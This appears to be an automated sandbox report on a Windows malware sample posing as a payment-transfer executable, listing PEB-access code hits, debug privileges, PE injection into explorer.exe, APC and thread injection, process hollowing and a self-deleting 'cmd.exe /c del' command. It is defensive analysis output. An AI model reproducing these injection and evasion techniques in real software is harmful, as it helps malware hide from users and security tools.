          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010A1C06 mov eax, dword ptr fs:[00000030h]4_2_010A1C06
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010A1C06 mov eax, dword ptr fs:[00000030h]4_2_010A1C06
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010A1C06 mov eax, dword ptr fs:[00000030h]4_2_010A1C06
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01066C0A mov eax, dword ptr fs:[00000030h]4_2_01066C0A
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01066C0A mov eax, dword ptr fs:[00000030h]4_2_01066C0A
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01066C0A mov eax, dword ptr fs:[00000030h]4_2_01066C0A
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01066C0A mov eax, dword ptr fs:[00000030h]4_2_01066C0A
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FFD5E0 mov eax, dword ptr fs:[00000030h]4_2_00FFD5E0
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FFD5E0 mov eax, dword ptr fs:[00000030h]4_2_00FFD5E0
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0101BC2C mov eax, dword ptr fs:[00000030h]4_2_0101BC2C
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0101A44B mov eax, dword ptr fs:[00000030h]4_2_0101A44B
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0107C450 mov eax, dword ptr fs:[00000030h]4_2_0107C450
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0107C450 mov eax, dword ptr fs:[00000030h]4_2_0107C450
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0100746D mov eax, dword ptr fs:[00000030h]4_2_0100746D
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FE2D8A mov eax, dword ptr fs:[00000030h]4_2_00FE2D8A
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FE2D8A mov eax, dword ptr fs:[00000030h]4_2_00FE2D8A
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FE2D8A mov eax, dword ptr fs:[00000030h]4_2_00FE2D8A
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FE2D8A mov eax, dword ptr fs:[00000030h]4_2_00FE2D8A
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FE2D8A mov eax, dword ptr fs:[00000030h]4_2_00FE2D8A
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF3D34 mov eax, dword ptr fs:[00000030h]4_2_00FF3D34
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF3D34 mov eax, dword ptr fs:[00000030h]4_2_00FF3D34
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF3D34 mov eax, dword ptr fs:[00000030h]4_2_00FF3D34
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF3D34 mov eax, dword ptr fs:[00000030h]4_2_00FF3D34
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF3D34 mov eax, dword ptr fs:[00000030h]4_2_00FF3D34
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF3D34 mov eax, dword ptr fs:[00000030h]4_2_00FF3D34
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF3D34 mov eax, dword ptr fs:[00000030h]4_2_00FF3D34
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF3D34 mov eax, dword ptr fs:[00000030h]4_2_00FF3D34
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF3D34 mov eax, dword ptr fs:[00000030h]4_2_00FF3D34
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF3D34 mov eax, dword ptr fs:[00000030h]4_2_00FF3D34
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF3D34 mov eax, dword ptr fs:[00000030h]4_2_00FF3D34
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF3D34 mov eax, dword ptr fs:[00000030h]4_2_00FF3D34
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF3D34 mov eax, dword ptr fs:[00000030h]4_2_00FF3D34
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FEAD30 mov eax, dword ptr fs:[00000030h]4_2_00FEAD30
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010B8CD6 mov eax, dword ptr fs:[00000030h]4_2_010B8CD6
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010A14FB mov eax, dword ptr fs:[00000030h]4_2_010A14FB
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01066CF0 mov eax, dword ptr fs:[00000030h]4_2_01066CF0
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01066CF0 mov eax, dword ptr fs:[00000030h]4_2_01066CF0
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01066CF0 mov eax, dword ptr fs:[00000030h]4_2_01066CF0
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010B070D mov eax, dword ptr fs:[00000030h]4_2_010B070D
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010B070D mov eax, dword ptr fs:[00000030h]4_2_010B070D
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0101A70E mov eax, dword ptr fs:[00000030h]4_2_0101A70E
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0101A70E mov eax, dword ptr fs:[00000030h]4_2_0101A70E
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0100F716 mov eax, dword ptr fs:[00000030h]4_2_0100F716
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0107FF10 mov eax, dword ptr fs:[00000030h]4_2_0107FF10
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0107FF10 mov eax, dword ptr fs:[00000030h]4_2_0107FF10
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF76E2 mov eax, dword ptr fs:[00000030h]4_2_00FF76E2
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0101E730 mov eax, dword ptr fs:[00000030h]4_2_0101E730
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010B8F6A mov eax, dword ptr fs:[00000030h]4_2_010B8F6A
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF766D mov eax, dword ptr fs:[00000030h]4_2_00FF766D
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01067794 mov eax, dword ptr fs:[00000030h]4_2_01067794
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01067794 mov eax, dword ptr fs:[00000030h]4_2_01067794
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01067794 mov eax, dword ptr fs:[00000030h]4_2_01067794
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF7E41 mov eax, dword ptr fs:[00000030h]4_2_00FF7E41
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF7E41 mov eax, dword ptr fs:[00000030h]4_2_00FF7E41
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF7E41 mov eax, dword ptr fs:[00000030h]4_2_00FF7E41
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF7E41 mov eax, dword ptr fs:[00000030h]4_2_00FF7E41
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF7E41 mov eax, dword ptr fs:[00000030h]4_2_00FF7E41
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF7E41 mov eax, dword ptr fs:[00000030h]4_2_00FF7E41
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FEE620 mov eax, dword ptr fs:[00000030h]4_2_00FEE620
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010237F5 mov eax, dword ptr fs:[00000030h]4_2_010237F5
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FEC600 mov eax, dword ptr fs:[00000030h]4_2_00FEC600
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FEC600 mov eax, dword ptr fs:[00000030h]4_2_00FEC600
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FEC600 mov eax, dword ptr fs:[00000030h]4_2_00FEC600
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01018E00 mov eax, dword ptr fs:[00000030h]4_2_01018E00
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010A1608 mov eax, dword ptr fs:[00000030h]4_2_010A1608
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0101A61C mov eax, dword ptr fs:[00000030h]4_2_0101A61C
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0101A61C mov eax, dword ptr fs:[00000030h]4_2_0101A61C
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0109FE3F mov eax, dword ptr fs:[00000030h]4_2_0109FE3F
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF8794 mov eax, dword ptr fs:[00000030h]4_2_00FF8794
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0100AE73 mov eax, dword ptr fs:[00000030h]4_2_0100AE73
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0100AE73 mov eax, dword ptr fs:[00000030h]4_2_0100AE73
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0100AE73 mov eax, dword ptr fs:[00000030h]4_2_0100AE73
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0100AE73 mov eax, dword ptr fs:[00000030h]4_2_0100AE73
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0100AE73 mov eax, dword ptr fs:[00000030h]4_2_0100AE73
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0107FE87 mov eax, dword ptr fs:[00000030h]4_2_0107FE87
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FFFF60 mov eax, dword ptr fs:[00000030h]4_2_00FFFF60
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010646A7 mov eax, dword ptr fs:[00000030h]4_2_010646A7
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010B0EA5 mov eax, dword ptr fs:[00000030h]4_2_010B0EA5
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010B0EA5 mov eax, dword ptr fs:[00000030h]4_2_010B0EA5
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010B0EA5 mov eax, dword ptr fs:[00000030h]4_2_010B0EA5
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FFEF40 mov eax, dword ptr fs:[00000030h]4_2_00FFEF40
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01028EC7 mov eax, dword ptr fs:[00000030h]4_2_01028EC7
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0109FEC0 mov eax, dword ptr fs:[00000030h]4_2_0109FEC0
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010136CC mov eax, dword ptr fs:[00000030h]4_2_010136CC
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FE4F2E mov eax, dword ptr fs:[00000030h]4_2_00FE4F2E
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FE4F2E mov eax, dword ptr fs:[00000030h]4_2_00FE4F2E
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010B8ED6 mov eax, dword ptr fs:[00000030h]4_2_010B8ED6
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010116E0 mov ecx, dword ptr fs:[00000030h]4_2_010116E0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CF8CD6 mov eax, dword ptr fs:[00000030h]9_2_04CF8CD6
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CE14FB mov eax, dword ptr fs:[00000030h]9_2_04CE14FB
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA6CF0 mov eax, dword ptr fs:[00000030h]9_2_04CA6CF0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA6CF0 mov eax, dword ptr fs:[00000030h]9_2_04CA6CF0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA6CF0 mov eax, dword ptr fs:[00000030h]9_2_04CA6CF0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C3849B mov eax, dword ptr fs:[00000030h]9_2_04C3849B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C5A44B mov eax, dword ptr fs:[00000030h]9_2_04C5A44B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CBC450 mov eax, dword ptr fs:[00000030h]9_2_04CBC450
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CBC450 mov eax, dword ptr fs:[00000030h]9_2_04CBC450
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe; Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\explorer.exe; Process token adjusted: Debug
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe; Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe; Memory written: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe; Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe; Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe; Thread register set: target process: 3388
          Source: C:\Windows\SysWOW64\explorer.exe; Thread register set: target process: 3388
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe; Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe; Section unmapped: C:\Windows\SysWOW64\explorer.exe base address: 330000
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe; Process created: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
          Source: C:\Windows\SysWOW64\explorer.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe'
          Source: explorer.exe, 00000005.00000002.741529190.0000000001398000.00000004.00000020.sdmp; Binary or memory string: ProgmanamF
          Source: explorer.exe, 00000005.00000000.241586685.0000000001980000.00000002.00000001.sdmp, explorer.exe, 00000009.00000002.745817464.0000000003440000.00000002.00000001.sdmp; Binary or memory string: Program Manager
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000004.00000002.275433894.0000000002B80000.00000040.00000001.sdmp, explorer.exe, 00000005.00000000.259445531.000000000871F000.00000004.00000001.sdmp, explorer.exe, 00000009.00000002.745817464.0000000003440000.00000002.00000001.sdmp; Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.241586685.0000000001980000.00000002.00000001.sdmp, explorer.exe, 00000009.00000002.745817464.0000000003440000.00000002.00000001.sdmp; Binary or memory string: Progman
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000004.00000002.275433894.0000000002B80000.00000040.00000001.sdmp; Binary or memory string: Microsoft-Reserved-24C26ACC-DE62-4303-88AD-6CD4F1447F18SecurityConfigureWindowsPasswordsProxy DesktopProgmanSoftware\Microsoft\Windows NT\CurrentVersion\WinlogonShellSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells\AvailableShells
          Source: explorer.exe, 00000005.00000000.241586685.0000000001980000.00000002.00000001.sdmp, explorer.exe, 00000009.00000002.745817464.0000000003440000.00000002.00000001.sdmp; Binary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
